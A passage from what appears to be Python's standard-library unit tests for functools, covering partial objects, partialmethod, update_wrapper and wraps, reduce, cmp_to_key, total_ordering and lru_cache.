self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
